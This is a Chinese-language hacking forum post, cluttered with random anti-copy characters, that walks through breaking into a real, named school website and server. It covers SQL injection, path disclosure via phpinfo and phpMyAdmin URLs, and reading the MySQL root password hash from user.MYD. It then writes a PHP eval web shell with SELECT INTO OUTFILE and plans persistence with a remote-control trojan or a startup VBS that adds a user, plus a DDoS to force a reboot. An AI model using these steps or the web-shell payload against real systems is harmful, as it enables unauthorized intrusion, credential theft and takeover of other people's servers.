第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
* I w4 ]5 u1 d0 y发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
8 y9 Z8 w: p; Z* \: b
8 ~3 R# f- f+ o4 w% F5 w) d1 U+ G% D' l& G
8 W" G" s9 j8 e5 ^ d& }常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
- x% U3 x: G9 P. D, o" [% H+ i0 {
. k7 Y' ~$ Q1 z- N5 r+ a2 ~那么想可以直接写入shell ,getshell有几个条件:
# ~1 J% a& x# V1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF & y/ q. z& r& T) {# ~
# r9 D [3 m" h$ ~# w: n1 d试着爆绝对路径: ( F0 N& l# ]% c- e/ l) T6 o6 F
1./phpMyAdmin/index.php?lang[]=1
) t! T: |6 X& p( [2./phpMyAdmin/phpinfo.php
& z" F# z- |) T3./load_file()
5 d; i& @% H: n, B3 Z( h' _4./phpmyadmin/themes/darkblue_orange/layout.inc.php 5 y0 d9 n, F$ r3 {- r1 m
5./phpmyadmin/libraries/select_lang.lib.php
( e( D9 k- r: p$ y* S9 N1 E9 t' S6./phpmyadmin/libraries/lect_lang.lib.php
% S5 N4 G, Q" e' e/ @0 W' @1 e( ^7./phpmyadmin/libraries/mcrypt.lib.php
4 O/ S( Z7 h' y, V) l: `. t9 G8./phpmyadmin/libraries/export/xls.php ) k! N. [6 x: c2 `
% A# }8 Y5 @5 }# D均不行...........................
1 c# Y) r- f3 B- F! l( [
1 S& r6 o" ?1 J3 W6 ]. G御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
+ U! P+ d& [ D& c" |8 K7 V8 Z
/ _: O3 Y7 ?% s- Z9 G w* D权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin % n& R6 s- H; ?2 h8 ?
( j$ D) d/ f4 A默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
' l! X& v9 ~1 {9 v6 n6 P2 b# i: u# k! P# W; p. L. J
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... / c$ k4 j6 W4 a( u3 m# k& }9 P
: p6 @, B {1 \ p- g
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
" U |! a6 A. A0 }% Q/ E" W; n/ t; e5 M8 ~- }
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
3 m% G( i/ d8 \+ B1 C/ `! Z6 h, R; D E! U: P* _3 C( K) y/ y
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD " E' ?7 g6 }. W. m
. i! c5 O( Q: ^& n3 Z" w成功读到root密码:
0 L; a4 f) a+ Y$ Z4 K- p
4 I# W+ u$ h, d% Z4 z17---- r(0072)
8 h0 G" r* p3 W: z* l18---- o(006f) . r' A8 K+ M2 p4 l( u! `
19---- o(006f) # Z) s( P% K; Y# a4 V
20---- t(0074)
: C# \3 s) h* v) X21---- *(002a)
1 ^/ A3 u6 @9 Y. [% k22---- 8(0038) + U" B, z+ N l. {3 I
23---- 2(0032)
! b t9 Z) {) A9 J" j8 D24---- E(0045) ' K( V$ K' z9 L; [
25---- 1(0031)
0 Y c* P% i: Q. w P8 ^. [26---- C(0043) 3 \$ y! e9 H/ W1 S- v- m! p
27---- 5(0035)
" O% C) U4 `9 v28---- 8(0038)
5 G; s6 O4 ~! }7 D$ K29---- 2(0032) 4 e3 T, S" v d; \( i$ Q
30---- 8(0038)
5 Y) M- k, E% z& f8 F31---- A(0041)
: f: ^$ S) N2 z$ Z2 K A+ O32---- 9(0039)
% ~( z+ P `2 z+ D+ X( ~/ o h& t, `# U33---- B(0042) 1 d: g7 o: e9 B5 P* l! M6 _/ t
34---- 5(0035)
$ b8 \1 r. g; M0 m$ u5 u35---- 4(0034) , {( O. }' Q ]0 a3 v, m
36---- 8(0038)
6 ^, X5 q3 Z8 h! k6 A( U% J37---- 6(0036)
8 p7 z) q! _/ F9 ^/ B: _; ^* L38---- 4(0034)
3 p% `3 m' ^. V39---- 9(0039) + m7 n; b/ B( O; t5 Z
40---- 1(0031) 4 L3 P, z( S/ M ?
41---- 1(0031)
, ] M- s$ \# Z! \) w! _42---- 5(0035) ! k1 k( H2 E; r# ~1 c
43---- 3(0033) + O- ^+ @4 D" D8 ~
44---- 5(0035) 4 D: A; q7 @8 c) \
45---- 9(0039) / r/ a. [; A! n, _, p+ x+ L7 c; V
46---- 8(0038)
0 Y+ n3 b- f' z0 j2 A47---- F(0046)
& k0 ^# r W; V0 b48---- F(0046)
. N- w V5 Q; J1 K! Y) L49---- 4(0034) , S1 }. q- x3 q' x
50---- F(0046)
% P4 d/ r% @3 y3 k# d! G" \4 \$ o51---- 0(0030) * v& a! X: I# S/ @6 }4 F4 J/ D2 x
52---- 3(0033)
' ?8 Z% |- C- h6 G- r1 r1 Z53---- 2(0032)
; g# O/ A- u& C0 x54---- A(0041)
: G) H: Y( O$ _. ?. X% z- Y/ h55---- 4(0034) . G4 `; A( F: Z9 b. l7 L) m
56---- A(0041)
6 O# \- }* S9 u* Y57---- B(0042)
! } I; w% Z6 ^$ }. ?2 \# q; _58---- *(0044) 9 F" x( Q) }% K2 ^4 P
59---- *(0035)
# U) l# I. j- ]: t* [60---- *(0041) 2 S$ ^8 j1 D7 p8 N& h8 [2 \
61---- *0032)
! B6 y( h' b. ~1 |3 l% J% G( `3 [( d3 N, E7 T' t2 |' a
解密后成功登陆phpmyamin
" p& E8 u$ q! s, t
: U0 h7 r8 i3 Q* t0 W* N1 o8 U$ A, \. s3 S; h1 n: n2 C8 M
: U* k. k2 D$ L* L3 u
0 E, v" ^: W6 z" A, H0 K' H
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' ; V' O1 L T$ h8 ~3 E
( q6 O8 {3 X, ]5 v2 D* w- |' M5 E成功执行,拿下shell,菜刀连接:
2 O& w* o; ?( C; ~# j8 [+ z& y/ M/ ]
服务器不支持asp,aspx,php提权无果...................
8 @, L$ B! }+ M4 L5 E& }- `0 h1 N0 s# ?9 X- O, P, J
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: ! @3 m7 o! p! O4 k' f% z
服务器上已经有个隐藏帐号了
& ^- A3 N+ n( {别名 administrators- ~1 t0 O1 a1 g
注释 管理员对计算机/域有不受限制的完全访问权 & ? o3 m5 D: V. F0 U
成员
4 l, |, l5 n7 Y6 F: Z' y3 i-------------------------------------------------------------------------------4 M V1 g F9 K T- W7 c% ^# L4 r
admin+ I) x- i% ]8 }; e
Administrator
5 J9 i% P3 D. tslipper$
6 Q+ C4 A6 }( \8 K8 c+ V8 ^sqluser+ A5 h2 a3 d! i1 w9 Y+ R
命令成功完成。
8 P$ D! p2 C$ k7 d$ C
8 h4 E/ W6 E6 g3 N% u/ R; t! ]9 v' M& x服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。: }0 y1 \' A2 H/ F
( L' s4 Q0 f( E3 Q9 o* l' b
ddos服务器重启,不然就只能坐等服务器重启了...............................
/ b! d+ ^: I0 y6 P
' U- R# _7 {8 ^' _4 T0 l3 h/ F ' |3 D, [/ U8 {, ?
|